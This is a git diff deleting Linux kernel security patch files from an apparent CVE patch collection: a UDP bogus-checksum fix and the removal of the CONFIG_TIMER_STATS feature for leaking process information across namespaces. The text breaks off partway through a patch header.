diff --git a/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch
deleted file mode 100644
index 58c295cc..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5364/ANY/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From beb39db59d14990e401e235faf66a6b9b31240b0 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet
-Date: Sat, 30 May 2015 09:16:53 -0700
-Subject: udp: fix behavior of wrong checksums
-
-We have two problems in UDP stack related to bogus checksums :
-
-1) We return -EAGAIN to application even if receive queue is not empty.
- This breaks applications using edge trigger epoll()
-
-2) Under UDP flood, we can loop forever without yielding to other
- processes, potentially hanging the host, especially on non SMP.
-
-This patch is an attempt to make things better.
-
-We might in the future add extra support for rt applications
-wanting to better control time spent doing a recv() in a hostile
-environment. For example we could validate checksums before queuing
-packets in socket receive queue.
-
-Signed-off-by: Eric Dumazet
-Cc: Willem de Bruijn
-Signed-off-by: David S. Miller
----
- net/ipv4/udp.c | 6 ++----
- net/ipv6/udp.c | 6 ++----
- 2 files changed, 4 insertions(+), 8 deletions(-)
-
-diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
-index d10b7e0..1c92ea6 100644
---- a/net/ipv4/udp.c
-+++ b/net/ipv4/udp.c
-@@ -1345,10 +1345,8 @@ csum_copy_err:
- }
- unlock_sock_fast(sk, slow);
-
-- if (noblock)
-- return -EAGAIN;
--
-- /* starting over for a new packet */
-+ /* starting over for a new packet, but check if we need to yield */
-+ cond_resched();
- msg->msg_flags &= ~MSG_TRUNC;
- goto try_again;
- }
-diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
-index c2ec416..e51fc3e 100644
---- a/net/ipv6/udp.c
-+++ b/net/ipv6/udp.c
-@@ -525,10 +525,8 @@ csum_copy_err:
- }
- unlock_sock_fast(sk, slow);
-
-- if (noblock)
-- return -EAGAIN;
--
-- /* starting over for a new packet */
-+ /* starting over for a new packet, but check if we need to yield */
-+ cond_resched();
- msg->msg_flags &= ~MSG_TRUNC;
- goto try_again;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch
deleted file mode 100644
index 596f8405..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch
+++ /dev/null
@@ -1,908 +0,0 @@ -From 0407c7a2f4734cd55902753d788fdbdc32ed7fd9 Mon Sep 17 00:00:00 2001 -From: Kees Cook -Date: Wed, 08 Feb 2017 11:26:59 -0800 -Subject: [PATCH] time: Remove CONFIG_TIMER_STATS - -Currently CONFIG_TIMER_STATS exposes process information across namespaces: - -kernel/time/timer_list.c print_timer(): - - SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); - -/proc/timer_list: - - #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570 - -Given that the tracer can give the same information, this patch entirely -removes CONFIG_TIMER_STATS. - -Change-Id: Ice26d74094d3ad563808342c1604ad444234844b -Suggested-by: Thomas Gleixner -Signed-off-by: Kees Cook -Acked-by: John Stultz -Cc: Nicolas Pitre -Cc: linux-doc@vger.kernel.org -Cc: Lai Jiangshan -Cc: Shuah Khan -Cc: Xing Gao -Cc: Jonathan Corbet -Cc: Jessica Frazelle -Cc: kernel-hardening@lists.openwall.com -Cc: Nicolas Iooss -Cc: "Paul E. McKenney" -Cc: Petr Mladek -Cc: Richard Cochran -Cc: Tejun Heo -Cc: Michal Marek -Cc: Josh Poimboeuf -Cc: Dmitry Vyukov -Cc: Oleg Nesterov -Cc: "Eric W. Biederman" -Cc: Olof Johansson -Cc: Andrew Morton -Cc: linux-api@vger.kernel.org -Cc: Arjan van de Ven -Link: http://lkml.kernel.org/r/20170208192659.GA32582@beast -Signed-off-by: Thomas Gleixner ---- - -diff --git a/Documentation/timers/timer_stats.txt b/Documentation/timers/timer_stats.txt -deleted file mode 100644 -index 8abd40b..0000000 ---- a/Documentation/timers/timer_stats.txt -+++ /dev/null -@@ -1,73 +0,0 @@ --timer_stats - timer usage statistics -------------------------------------- -- --timer_stats is a debugging facility to make the timer (ab)usage in a Linux --system visible to kernel and userspace developers. If enabled in the config --but not used it has almost zero runtime overhead, and a relatively small --data structure overhead. Even if collection is enabled runtime all the --locking is per-CPU and lookup is hashed. 
-- --timer_stats should be used by kernel and userspace developers to verify that --their code does not make unduly use of timers. This helps to avoid unnecessary --wakeups, which should be avoided to optimize power consumption. -- --It can be enabled by CONFIG_TIMER_STATS in the "Kernel hacking" configuration --section. -- --timer_stats collects information about the timer events which are fired in a --Linux system over a sample period: -- --- the pid of the task(process) which initialized the timer --- the name of the process which initialized the timer --- the function where the timer was initialized --- the callback function which is associated to the timer --- the number of events (callbacks) -- --timer_stats adds an entry to /proc: /proc/timer_stats -- --This entry is used to control the statistics functionality and to read out the --sampled information. -- --The timer_stats functionality is inactive on bootup. -- --To activate a sample period issue: --# echo 1 >/proc/timer_stats -- --To stop a sample period issue: --# echo 0 >/proc/timer_stats -- --The statistics can be retrieved by: --# cat /proc/timer_stats -- --The readout of /proc/timer_stats automatically disables sampling. The sampled --information is kept until a new sample period is started. This allows multiple --readouts. 
-- --Sample output of /proc/timer_stats: -- --Timerstats sample period: 3.888770 s -- 12, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 15, 1 swapper hcd_submit_urb (rh_timer_func) -- 4, 959 kedac schedule_timeout (process_timeout) -- 1, 0 swapper page_writeback_init (wb_timer_fn) -- 28, 0 swapper hrtimer_stop_sched_tick (hrtimer_sched_tick) -- 22, 2948 IRQ 4 tty_flip_buffer_push (delayed_work_timer_fn) -- 3, 3100 bash schedule_timeout (process_timeout) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- 1, 1 swapper neigh_table_init_no_netlink (neigh_periodic_timer) -- 1, 2292 ip __netdev_watchdog_up (dev_watchdog) -- 1, 23 events/1 do_cache_clean (delayed_work_timer_fn) --90 total events, 30.0 events/sec -- --The first column is the number of events, the second column the pid, the third --column is the name of the process. The forth column shows the function which --initialized the timer and in parenthesis the callback function which was --executed on expiry. -- -- Thomas, Ingo -- --Added flag to indicate 'deferrable timer' in /proc/timer_stats. 
A deferrable --timer will appear as follows -- 10D, 1 swapper queue_delayed_work_on (delayed_work_timer_fn) -- -diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h -index 0302bbe..765d9e7 100644 ---- a/include/linux/hrtimer.h -+++ b/include/linux/hrtimer.h -@@ -96,12 +96,6 @@ - * @function: timer expiry callback function - * @base: pointer to the timer base (per cpu and per clock) - * @state: state information (See bit values above) -- * @start_site: timer statistics field to store the site where the timer -- * was started -- * @start_comm: timer statistics field to store the name of the process which -- * started the timer -- * @start_pid: timer statistics field to store the pid of the task which -- * started the timer - * - * The hrtimer structure must be initialized by hrtimer_init() - */ -@@ -111,11 +105,6 @@ - enum hrtimer_restart (*function)(struct hrtimer *); - struct hrtimer_clock_base *base; - unsigned long state; --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - }; - - /** -diff --git a/include/linux/timer.h b/include/linux/timer.h -index 8c5a197..7c8adfa 100644 ---- a/include/linux/timer.h -+++ b/include/linux/timer.h -@@ -23,11 +23,6 @@ - - int slack; - --#ifdef CONFIG_TIMER_STATS -- int start_pid; -- void *start_site; -- char start_comm[16]; --#endif - #ifdef CONFIG_LOCKDEP - struct lockdep_map lockdep_map; - #endif -@@ -193,49 +188,6 @@ - * jiffie. 
- */ - extern unsigned long get_next_timer_interrupt(unsigned long now); -- --/* -- * Timer-statistics info: -- */ --#ifdef CONFIG_TIMER_STATS -- --extern int timer_stats_active; -- --#define TIMER_STATS_FLAG_DEFERRABLE 0x1 -- --extern void init_timer_stats(void); -- --extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, -- unsigned int timer_flag); -- --extern void __timer_stats_timer_set_start_info(struct timer_list *timer, -- void *addr); -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ -- if (likely(!timer_stats_active)) -- return; -- __timer_stats_timer_set_start_info(timer, __builtin_return_address(0)); --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ -- timer->start_site = NULL; --} --#else --static inline void init_timer_stats(void) --{ --} -- --static inline void timer_stats_timer_set_start_info(struct timer_list *timer) --{ --} -- --static inline void timer_stats_timer_clear_start_info(struct timer_list *timer) --{ --} --#endif - - extern void add_timer(struct timer_list *timer); - -diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c -index 47067de..c9c3a6c 100644 ---- a/kernel/hrtimer.c -+++ b/kernel/hrtimer.c -@@ -827,34 +827,6 @@ - clock_was_set_delayed(); - } - --static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (timer->start_site) -- return; -- timer->start_site = __builtin_return_address(0); -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --#endif --} -- --static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; --#endif --} -- --static inline void timer_stats_account_hrtimer(struct hrtimer *timer) --{ --#ifdef CONFIG_TIMER_STATS -- if (likely(!timer_stats_active)) -- return; -- timer_stats_update_stats(timer, timer->start_pid, 
timer->start_site, -- timer->function, timer->start_comm, 0); --#endif --} -- - /* - * Counterpart to lock_hrtimer_base above: - */ -@@ -988,7 +960,6 @@ - * rare case and less expensive than a smp call. - */ - debug_deactivate(timer); -- timer_stats_hrtimer_clear_start_info(timer); - reprogram = base->cpu_base == &__get_cpu_var(hrtimer_bases); - /* - * We must preserve the CALLBACK state flag here, -@@ -1033,8 +1004,6 @@ - - /* Switch the timer base, if necessary: */ - new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED); -- -- timer_stats_hrtimer_set_start_info(timer); - - leftmost = enqueue_hrtimer(timer, new_base); - -@@ -1211,12 +1180,6 @@ - base = hrtimer_clockid_to_base(clock_id); - timer->base = &cpu_base->clock_base[base]; - timerqueue_init(&timer->node); -- --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - } - - /** -@@ -1264,7 +1227,6 @@ - - debug_deactivate(timer); - __remove_hrtimer(timer, base, HRTIMER_STATE_CALLBACK, 0); -- timer_stats_account_hrtimer(timer); - fn = timer->function; - - /* -diff --git a/kernel/time/Makefile b/kernel/time/Makefile -index aa91af5..fd87e51 100644 ---- a/kernel/time/Makefile -+++ b/kernel/time/Makefile -@@ -7,4 +7,3 @@ - obj-$(CONFIG_GENERIC_SCHED_CLOCK) += sched_clock.o - obj-$(CONFIG_TICK_ONESHOT) += tick-oneshot.o - obj-$(CONFIG_TICK_ONESHOT) += tick-sched.o --obj-$(CONFIG_TIMER_STATS) += timer_stats.o -diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c -index 61ed862..f6a1043 100644 ---- a/kernel/time/timer_list.c -+++ b/kernel/time/timer_list.c -@@ -57,21 +57,11 @@ - print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer, - int idx, u64 now) - { --#ifdef CONFIG_TIMER_STATS -- char tmp[TASK_COMM_LEN + 1]; --#endif - SEQ_printf(m, " #%d: ", idx); - print_name_offset(m, taddr); - SEQ_printf(m, ", "); - print_name_offset(m, timer->function); - SEQ_printf(m, ", S:%02lx", 
timer->state); --#ifdef CONFIG_TIMER_STATS -- SEQ_printf(m, ", "); -- print_name_offset(m, timer->start_site); -- memcpy(tmp, timer->start_comm, TASK_COMM_LEN); -- tmp[TASK_COMM_LEN] = 0; -- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid); --#endif - SEQ_printf(m, "\n"); - SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n", - (unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)), -diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c -deleted file mode 100644 -index 0b537f2..0000000 ---- a/kernel/time/timer_stats.c -+++ /dev/null -@@ -1,425 +0,0 @@ --/* -- * kernel/time/timer_stats.c -- * -- * Collect timer usage statistics. -- * -- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar -- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner -- * -- * timer_stats is based on timer_top, a similar functionality which was part of -- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the -- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based -- * on dynamic allocation of the statistics entries and linear search based -- * lookup combined with a global lock, rather than the static array, hash -- * and per-CPU locking which is used by timer_stats. It was written for the -- * pre hrtimer kernel code and therefore did not take hrtimers into account. -- * Nevertheless it provided the base for the timer_stats implementation and -- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks -- * for this effort. -- * -- * timer_top.c is -- * Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus -- * Written by Daniel Petrini -- * timer_top.c was released under the GNU General Public License version 2 -- * -- * We export the addresses and counting of timer functions being called, -- * the pid and cmdline from the owner process if applicable. 
-- * -- * Start/stop data collection: -- * # echo [1|0] >/proc/timer_stats -- * -- * Display the information collected so far: -- * # cat /proc/timer_stats -- * -- * This program is free software; you can redistribute it and/or modify -- * it under the terms of the GNU General Public License version 2 as -- * published by the Free Software Foundation. -- */ -- --#include --#include --#include --#include --#include --#include -- --#include -- --/* -- * This is our basic unit of interest: a timer expiry event identified -- * by the timer, its start/expire functions and the PID of the task that -- * started the timer. We count the number of times an event happens: -- */ --struct entry { -- /* -- * Hash list: -- */ -- struct entry *next; -- -- /* -- * Hash keys: -- */ -- void *timer; -- void *start_func; -- void *expire_func; -- pid_t pid; -- -- /* -- * Number of timeout events: -- */ -- unsigned long count; -- unsigned int timer_flag; -- -- /* -- * We save the command-line string to preserve -- * this information past task exit: -- */ -- char comm[TASK_COMM_LEN + 1]; -- --} ____cacheline_aligned_in_smp; -- --/* -- * Spinlock protecting the tables - not taken during lookup: -- */ --static DEFINE_RAW_SPINLOCK(table_lock); -- --/* -- * Per-CPU lookup locks for fast hash lookup: -- */ --static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock); -- --/* -- * Mutex to serialize state changes with show-stats activities: -- */ --static DEFINE_MUTEX(show_mutex); -- --/* -- * Collection status, active/inactive: -- */ --int __read_mostly timer_stats_active; -- --/* -- * Beginning/end timestamps of measurement: -- */ --static ktime_t time_start, time_stop; -- --/* -- * tstat entry structs only get allocated while collection is -- * active and never freed during that time - this simplifies -- * things quite a bit. -- * -- * They get freed when a new collection period is started. 
-- */ --#define MAX_ENTRIES_BITS 10 --#define MAX_ENTRIES (1UL << MAX_ENTRIES_BITS) -- --static unsigned long nr_entries; --static struct entry entries[MAX_ENTRIES]; -- --static atomic_t overflow_count; -- --/* -- * The entries are in a hash-table, for fast lookup: -- */ --#define TSTAT_HASH_BITS (MAX_ENTRIES_BITS - 1) --#define TSTAT_HASH_SIZE (1UL << TSTAT_HASH_BITS) --#define TSTAT_HASH_MASK (TSTAT_HASH_SIZE - 1) -- --#define __tstat_hashfn(entry) \ -- (((unsigned long)(entry)->timer ^ \ -- (unsigned long)(entry)->start_func ^ \ -- (unsigned long)(entry)->expire_func ^ \ -- (unsigned long)(entry)->pid ) & TSTAT_HASH_MASK) -- --#define tstat_hashentry(entry) (tstat_hash_table + __tstat_hashfn(entry)) -- --static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly; -- --static void reset_entries(void) --{ -- nr_entries = 0; -- memset(entries, 0, sizeof(entries)); -- memset(tstat_hash_table, 0, sizeof(tstat_hash_table)); -- atomic_set(&overflow_count, 0); --} -- --static struct entry *alloc_entry(void) --{ -- if (nr_entries >= MAX_ENTRIES) -- return NULL; -- -- return entries + nr_entries++; --} -- --static int match_entries(struct entry *entry1, struct entry *entry2) --{ -- return entry1->timer == entry2->timer && -- entry1->start_func == entry2->start_func && -- entry1->expire_func == entry2->expire_func && -- entry1->pid == entry2->pid; --} -- --/* -- * Look up whether an entry matching this item is present -- * in the hash already. 
Must be called with irqs off and the -- * lookup lock held: -- */ --static struct entry *tstat_lookup(struct entry *entry, char *comm) --{ -- struct entry **head, *curr, *prev; -- -- head = tstat_hashentry(entry); -- curr = *head; -- -- /* -- * The fastpath is when the entry is already hashed, -- * we do this with the lookup lock held, but with the -- * table lock not held: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- return curr; -- -- curr = curr->next; -- } -- /* -- * Slowpath: allocate, set up and link a new hash entry: -- */ -- prev = NULL; -- curr = *head; -- -- raw_spin_lock(&table_lock); -- /* -- * Make sure we have not raced with another CPU: -- */ -- while (curr) { -- if (match_entries(curr, entry)) -- goto out_unlock; -- -- prev = curr; -- curr = curr->next; -- } -- -- curr = alloc_entry(); -- if (curr) { -- *curr = *entry; -- curr->count = 0; -- curr->next = NULL; -- memcpy(curr->comm, comm, TASK_COMM_LEN); -- -- smp_mb(); /* Ensure that curr is initialized before insert */ -- -- if (prev) -- prev->next = curr; -- else -- *head = curr; -- } -- out_unlock: -- raw_spin_unlock(&table_lock); -- -- return curr; --} -- --/** -- * timer_stats_update_stats - Update the statistics for a timer. -- * @timer: pointer to either a timer_list or a hrtimer -- * @pid: the pid of the task which set up the timer -- * @startf: pointer to the function which did the timer setup -- * @timerf: pointer to the timer callback function of the timer -- * @comm: name of the process which set up the timer -- * -- * When the timer is already registered, then the event counter is -- * incremented. Otherwise the timer is registered in a free slot. 
-- */ --void timer_stats_update_stats(void *timer, pid_t pid, void *startf, -- void *timerf, char *comm, -- unsigned int timer_flag) --{ -- /* -- * It doesn't matter which lock we take: -- */ -- raw_spinlock_t *lock; -- struct entry *entry, input; -- unsigned long flags; -- -- if (likely(!timer_stats_active)) -- return; -- -- lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id()); -- -- input.timer = timer; -- input.start_func = startf; -- input.expire_func = timerf; -- input.pid = pid; -- input.timer_flag = timer_flag; -- -- raw_spin_lock_irqsave(lock, flags); -- if (!timer_stats_active) -- goto out_unlock; -- -- entry = tstat_lookup(&input, comm); -- if (likely(entry)) -- entry->count++; -- else -- atomic_inc(&overflow_count); -- -- out_unlock: -- raw_spin_unlock_irqrestore(lock, flags); --} -- --static void print_name_offset(struct seq_file *m, unsigned long addr) --{ -- char symname[KSYM_NAME_LEN]; -- -- if (lookup_symbol_name(addr, symname) < 0) -- seq_printf(m, "<%p>", (void *)addr); -- else -- seq_printf(m, "%s", symname); --} -- --static int tstats_show(struct seq_file *m, void *v) --{ -- struct timespec period; -- struct entry *entry; -- unsigned long ms; -- long events = 0; -- ktime_t time; -- int i; -- -- mutex_lock(&show_mutex); -- /* -- * If still active then calculate up to now: -- */ -- if (timer_stats_active) -- time_stop = ktime_get(); -- -- time = ktime_sub(time_stop, time_start); -- -- period = ktime_to_timespec(time); -- ms = period.tv_nsec / 1000000; -- -- seq_puts(m, "Timer Stats Version: v0.2\n"); -- seq_printf(m, "Sample period: %ld.%03ld s\n", period.tv_sec, ms); -- if (atomic_read(&overflow_count)) -- seq_printf(m, "Overflow: %d entries\n", -- atomic_read(&overflow_count)); -- -- for (i = 0; i < nr_entries; i++) { -- entry = entries + i; -- if (entry->timer_flag & TIMER_STATS_FLAG_DEFERRABLE) { -- seq_printf(m, "%4luD, %5d %-16s ", -- entry->count, entry->pid, entry->comm); -- } else { -- seq_printf(m, " %4lu, %5d %-16s ", -- 
entry->count, entry->pid, entry->comm); -- } -- -- print_name_offset(m, (unsigned long)entry->start_func); -- seq_puts(m, " ("); -- print_name_offset(m, (unsigned long)entry->expire_func); -- seq_puts(m, ")\n"); -- -- events += entry->count; -- } -- -- ms += period.tv_sec * 1000; -- if (!ms) -- ms = 1; -- -- if (events && period.tv_sec) -- seq_printf(m, "%ld total events, %ld.%03ld events/sec\n", -- events, events * 1000 / ms, -- (events * 1000000 / ms) % 1000); -- else -- seq_printf(m, "%ld total events\n", events); -- -- mutex_unlock(&show_mutex); -- -- return 0; --} -- --/* -- * After a state change, make sure all concurrent lookup/update -- * activities have stopped: -- */ --static void sync_access(void) --{ -- unsigned long flags; -- int cpu; -- -- for_each_online_cpu(cpu) { -- raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu); -- -- raw_spin_lock_irqsave(lock, flags); -- /* nothing */ -- raw_spin_unlock_irqrestore(lock, flags); -- } --} -- --static ssize_t tstats_write(struct file *file, const char __user *buf, -- size_t count, loff_t *offs) --{ -- char ctl[2]; -- -- if (count != 2 || *offs) -- return -EINVAL; -- -- if (copy_from_user(ctl, buf, count)) -- return -EFAULT; -- -- mutex_lock(&show_mutex); -- switch (ctl[0]) { -- case '0': -- if (timer_stats_active) { -- timer_stats_active = 0; -- time_stop = ktime_get(); -- sync_access(); -- } -- break; -- case '1': -- if (!timer_stats_active) { -- reset_entries(); -- time_start = ktime_get(); -- smp_mb(); -- timer_stats_active = 1; -- } -- break; -- default: -- count = -EINVAL; -- } -- mutex_unlock(&show_mutex); -- -- return count; --} -- --static int tstats_open(struct inode *inode, struct file *filp) --{ -- return single_open(filp, tstats_show, NULL); --} -- --static const struct file_operations tstats_fops = { -- .open = tstats_open, -- .read = seq_read, -- .write = tstats_write, -- .llseek = seq_lseek, -- .release = single_release, --}; -- --void __init init_timer_stats(void) --{ -- int cpu; -- -- 
for_each_possible_cpu(cpu) -- raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu)); --} -- --static int __init init_tstats_procfs(void) --{ -- struct proc_dir_entry *pe; -- -- pe = proc_create("timer_stats", 0644, NULL, &tstats_fops); -- if (!pe) -- return -ENOMEM; -- return 0; --} --__initcall(init_tstats_procfs); -diff --git a/kernel/timer.c b/kernel/timer.c -index 5733076..8bff0a9 100644 ---- a/kernel/timer.c -+++ b/kernel/timer.c -@@ -397,34 +397,6 @@ - } - } - --#ifdef CONFIG_TIMER_STATS --void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr) --{ -- if (timer->start_site) -- return; -- -- timer->start_site = addr; -- memcpy(timer->start_comm, current->comm, TASK_COMM_LEN); -- timer->start_pid = current->pid; --} -- --static void timer_stats_account_timer(struct timer_list *timer) --{ -- unsigned int flag = 0; -- -- if (likely(!timer->start_site)) -- return; -- if (unlikely(tbase_get_deferrable(timer->base))) -- flag |= TIMER_STATS_FLAG_DEFERRABLE; -- -- timer_stats_update_stats(timer, timer->start_pid, timer->start_site, -- timer->function, timer->start_comm, flag); --} -- --#else --static void timer_stats_account_timer(struct timer_list *timer) {} --#endif -- - #ifdef CONFIG_DEBUG_OBJECTS_TIMERS - - static struct debug_obj_descr timer_debug_descr; -@@ -637,11 +609,6 @@ - timer->entry.next = NULL; - timer->base = (void *)((unsigned long)base | flags); - timer->slack = -1; --#ifdef CONFIG_TIMER_STATS -- timer->start_site = NULL; -- timer->start_pid = -1; -- memset(timer->start_comm, 0, TASK_COMM_LEN); --#endif - lockdep_init_map(&timer->lockdep_map, name, key, 0); - } - -@@ -739,7 +706,6 @@ - unsigned long flags; - int ret = 0 , cpu; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(!timer->function); - - base = lock_timer_base(timer, &flags); -@@ -943,7 +909,6 @@ - struct tvec_base *base = per_cpu(tvec_bases, cpu); - unsigned long flags; - -- timer_stats_timer_set_start_info(timer); - BUG_ON(timer_pending(timer) || 
!timer->function); - spin_lock_irqsave(&base->lock, flags); - timer_set_base(timer, base); -@@ -981,7 +946,6 @@ - - debug_assert_init(timer); - -- timer_stats_timer_clear_start_info(timer); - if (timer_pending(timer)) { - base = lock_timer_base(timer, &flags); - ret = detach_if_pending(timer, base, true); -@@ -1009,10 +973,9 @@ - - base = lock_timer_base(timer, &flags); - -- if (base->running_timer != timer) { -- timer_stats_timer_clear_start_info(timer); -+ if (base->running_timer != timer) - ret = detach_if_pending(timer, base, true); -- } -+ - spin_unlock_irqrestore(&base->lock, flags); - - return ret; -@@ -1192,8 +1155,6 @@ - fn = timer->function; - data = timer->data; - irqsafe = tbase_get_irqsafe(timer->base); -- -- timer_stats_account_timer(timer); - - base->running_timer = timer; - detach_expired_timer(timer, base); -@@ -1695,7 +1656,6 @@ - - err = timer_cpu_notify(&timers_nb, (unsigned long)CPU_UP_PREPARE, - (void *)(long)smp_processor_id()); -- init_timer_stats(); - - BUG_ON(err != NOTIFY_OK); - -diff --git a/kernel/workqueue.c b/kernel/workqueue.c -index 2505648..562f1a5 100755 ---- a/kernel/workqueue.c -+++ b/kernel/workqueue.c -@@ -1448,8 +1448,6 @@ - return; - } - -- timer_stats_timer_set_start_info(&dwork->timer); -- - dwork->wq = wq; - dwork->cpu = cpu; - timer->expires = jiffies + delay; -diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug -index a0818f1..822e2be 100755 ---- a/lib/Kconfig.debug -+++ b/lib/Kconfig.debug -@@ -400,20 +400,6 @@ - application, you can say N to avoid the very slight overhead - this adds. - --config TIMER_STATS -- bool "Collect kernel timers statistics" -- depends on DEBUG_KERNEL && PROC_FS -- help -- If you say Y here, additional code will be inserted into the -- timer routines to collect statistics about kernel timers being -- reprogrammed. The statistics can be read from /proc/timer_stats. -- The statistics collection is started by writing 1 to /proc/timer_stats, -- writing 0 stops it. 
This feature is useful to collect information -- about timer usage patterns in kernel and userspace. This feature -- is lightweight if enabled in the kernel config but not activated -- (it defaults to deactivated on bootup and will only be activated -- if some application like powertop activates it explicitly). -- - config DEBUG_OBJECTS - bool "Debug object operations" - depends on DEBUG_KERNEL diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64 deleted file mode 100644 index 1883365e..00000000 --- a/Patches/Linux_CVEs/CVE-2015-5366/3.10/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch deleted file mode 100644 index 90b2f55c..00000000 --- a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch +++ /dev/null @@ -1,20 +0,0 @@ -From 63d41fb2b101ff0bd786deab3c60114d38d47048 Mon Sep 17 00:00:00 2001 -From: Christopher R. Palmer -Date: Sat, 29 Apr 2017 06:44:14 -0400 -Subject: [PATCH] pme: defconfig: Remove CONFIG_TIMER_STATS - -Change-Id: Ib4c88393eccc70e998f3a7dcc9f9a4de5230735c ---- - -diff --git a/arch/arm64/configs/pme_defconfig b/arch/arm64/configs/pme_defconfig -index b145bb6..6ad8818 100644 ---- a/arch/arm64/configs/pme_defconfig -+++ b/arch/arm64/configs/pme_defconfig -@@ -4414,7 +4414,6 @@ - # CONFIG_PANIC_ON_RT_THROTTLING is not set - # CONFIG_SCHEDSTATS is not set - # CONFIG_SCHED_STACK_END_CHECK is not set --CONFIG_TIMER_STATS=y - # CONFIG_DEBUG_MODULE_SCAN_OFF is not set - # CONFIG_DEBUG_TASK_STACK_SCAN_OFF is not set - # CONFIG_DEBUG_PREEMPT is not set diff --git a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64 b/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64 deleted file mode 100644 index 577a36e4..00000000 
--- a/Patches/Linux_CVEs/CVE-2015-5366/3.18/0002.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch b/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch
deleted file mode 100644
index b7bd1067..00000000
--- a/Patches/Linux_CVEs/CVE-2015-5366/^4.9/0003.patch
+++ /dev/null
@@ -1,939 +0,0 @@
-From dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 Mon Sep 17 00:00:00 2001
-From: Kees Cook
-Date: Wed, 8 Feb 2017 11:26:59 -0800
-Subject: time: Remove CONFIG_TIMER_STATS
-
-Currently CONFIG_TIMER_STATS exposes process information across namespaces:
-
-kernel/time/timer_list.c print_timer():
-
- SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
-
-/proc/timer_list:
-
- #11: <0000000000000000>, hrtimer_wakeup, S:01, do_nanosleep, cron/2570
-
-Given that the tracer can give the same information, this patch entirely
-removes CONFIG_TIMER_STATS.
-
-Suggested-by: Thomas Gleixner
-Signed-off-by: Kees Cook
-Acked-by: John Stultz
-Cc: Nicolas Pitre
-Cc: linux-doc@vger.kernel.org
-Cc: Lai Jiangshan
-Cc: Shuah Khan
-Cc: Xing Gao
-Cc: Jonathan Corbet
-Cc: Jessica Frazelle
-Cc: kernel-hardening@lists.openwall.com
-Cc: Nicolas Iooss
-Cc: "Paul E. McKenney"
-Cc: Petr Mladek
-Cc: Richard Cochran
-Cc: Tejun Heo
-Cc: Michal Marek
-Cc: Josh Poimboeuf
-Cc: Dmitry Vyukov
-Cc: Oleg Nesterov
-Cc: "Eric W. 
